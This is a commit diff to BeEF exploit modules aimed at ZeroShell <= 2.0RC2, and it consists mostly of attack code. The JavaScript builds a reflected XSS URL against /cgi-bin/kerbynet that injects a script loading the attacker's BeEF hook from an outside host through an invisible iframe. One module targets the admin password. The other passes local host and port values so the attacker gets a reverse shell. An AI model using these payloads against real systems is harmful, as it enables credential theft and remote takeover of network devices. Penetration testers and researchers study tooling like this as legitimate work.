Update hookuri auto-generated and generic (proto / host / port / hook name).
Replace tab with space.
This commit is contained in:
Yann CAM
@@ -7,7 +7,7 @@ beef:
|
||||
module:
|
||||
zeroshell_2_0rc2_admin_password:
|
||||
enable: true
|
||||
category: ["Exploits", "ZeroShell"]
|
||||
category: ["Exploits", "ZeroShell"]
|
||||
name: "ZeroShell <= 2.0RC2 Admin Password"
|
||||
description: "Attempts to get the admin password on a ZeroShell <= 2.0RC2<br />This module works only when the hook is on ZeroShell, please migrate to the ZeroShell target before using it.<br />Vulnerability found and PoC provided by Yann CAM <a href='http://www.asafety.fr' target='_blank'>@ASafety</a> / <a href='http://www.synetis.com' target='_blank'>Synetis</a>.<br />BeEF module originally created by ycam.<br />For more information refer to <a href='http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt' target='_blank'>http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt</a><br />Patched in version 2.0RC3.<br />"
|
||||
authors: ["ycam"]
|
||||
|
||||
@@ -7,10 +7,10 @@
|
||||
beef.execute(function() {
|
||||
var rhost = '<%= @rhost %>';
|
||||
var rport = '<%= @rport %>';
|
||||
var hookuri = '<%= @hookuri %>';
|
||||
var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
|
||||
|
||||
var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x<script src='" + hook + "'></script>";
|
||||
|
||||
var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x<script src='" + hookuri + "'></script>";
|
||||
|
||||
var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
iframe_<%= @command_id %>.setAttribute('src', target);
|
||||
|
||||
|
||||
@@ -7,9 +7,7 @@ class Zeroshell_2_0rc2_migrate_hook < BeEF::Core::Command
|
||||
|
||||
def self.options
|
||||
configuration = BeEF::Core::Configuration.instance
|
||||
hookuri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
|
||||
return [
|
||||
{ 'name' => 'hookuri', 'ui_label' => 'URL', 'type' => 'text', 'width' => '400px', 'value' => hookuri},
|
||||
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'},
|
||||
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }
|
||||
]
|
||||
|
||||
@@ -9,9 +9,9 @@ beef.execute(function() {
|
||||
var rport = '<%= @rport %>';
|
||||
var lhost = '<%= @lhost %>';
|
||||
var lport = '<%= @lport %>';
|
||||
var hookuri = '<%= @hookuri %>';
|
||||
var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + "/x.js";
|
||||
|
||||
var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x<script src='" + hookuri + "'></script>#lhost=" + lhost + "&lport=" + lport;
|
||||
var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x<script src='" + hook + "'></script>#lhost=" + lhost + "&lport=" + lport;
|
||||
var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
iframe_<%= @command_id %>.setAttribute('src', target);
|
||||
|
||||
|
||||
@@ -12,9 +12,7 @@ class Zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass < BeEF::Core::Command
|
||||
configuration = BeEF::Core::Configuration.instance
|
||||
lhost = "#{configuration.get("beef.http.host")}"
|
||||
lhost = "" if lhost == "0.0.0.0"
|
||||
hookuri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/x.js"
|
||||
return [
|
||||
{ 'name' => 'hookuri', 'ui_label' => 'URL', 'type' => 'text', 'width' => '400px', 'value' => hookuri},
|
||||
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'},
|
||||
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
|
||||
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},
|
||||
|
||||
Reference in New Issue
Block a user